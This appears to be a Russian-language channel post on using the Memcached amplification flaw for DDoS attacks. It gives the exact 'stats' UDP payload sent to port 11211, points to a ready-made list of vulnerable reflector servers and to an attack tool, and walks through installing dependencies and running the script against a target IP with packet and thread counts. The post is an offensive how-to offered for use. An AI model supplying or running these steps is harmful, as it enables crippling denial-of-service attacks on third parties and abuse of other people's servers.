Усиливаем атаки с помощью уязвимости в Memcached

Усиливаем атаки с помощью уязвимости в Memcached

@webware

t.me/webware

Взломать все - не может никто.

Суть в том, что все вы не взломаете, насколько крутыми вы бы не были, всегда найдется тот, кто круче вас. Для Хакера, DDOS - это последнее, чем он воспользуется. Мне не раз приходилось отбивать атаки и с каждым разом они становились все мощнее. Хакеры уже перестали взламывать, когда они могут устроить ddos атаку. Теперь даже не нужно создавать ботнет, в интернете много уязвимых серверов, которые усиливают атаки. И вот обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:

\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.


Практика

Для начало нам нужно найти сервера, для этого мы воспользуемся Shodan .

Или воспользуемся уже готовым списком, который собрали до нас - https://pastebin.com/raw/eSCHTTVu . Скрипт для атаки написан на python 2.7.

sudo apt-get install python

Далее установим библиотеки:

python -m pip install datetime
python -m pip install scapy

Итак, запускаем программу:

python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки

Ссылка на программу - https://github.com/DefWolf/Memecrashed

Источник codeby.net

Report Page